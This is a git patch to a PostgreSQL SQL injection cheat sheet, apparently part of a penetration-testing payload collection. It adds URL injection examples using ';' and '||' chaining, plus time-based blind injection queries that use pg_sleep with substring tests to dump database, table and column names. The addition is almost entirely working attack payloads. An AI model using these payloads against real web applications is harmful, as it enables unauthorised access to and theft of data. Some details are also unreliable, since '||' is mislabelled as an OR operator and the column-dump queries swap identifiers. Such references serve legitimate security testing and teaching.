From aa89a909d178c076baf7bf5e71c10925697929ff Mon Sep 17 00:00:00 2001
From: Dhmos Funk <45040001+dhmosfunk@users.noreply.github.com>
Date: Sat, 10 Sep 2022 15:56:31 +0300
Subject: [PATCH] Update PostgreSQL Injection.md

---
 SQL Injection/PostgreSQL Injection.md | 33 +++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index ce07cf4..72efb30 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -34,6 +34,16 @@
 /**/  
 ```
 
+## PostgreSQL chain injection points symbols
+```sql
+; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
+|| #or statement 
+
+# usage examples: 
+/?whatever=1;(select 1 from pg_sleep(5))
+/?whatever=1||(select 1 from pg_sleep(5))
+```
+
 ## PostgreSQL Version
 
 ```sql
@@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la
 ```
 
 ## PostgreSQL Time Based
+#### Identify time based
+
+```sql
+select 1 from pg_sleep(5)
+;(select 1 from pg_sleep(5))
+||(select 1 from pg_sleep(5))
+```
+
+#### Database dump time based
+```sql
+select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
+```
+
+#### Table dump time based
+```sql
+select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
+```
+#### columns dump time based
+```sql
+select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1
+select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1
+```
+
 
 ```sql
 AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))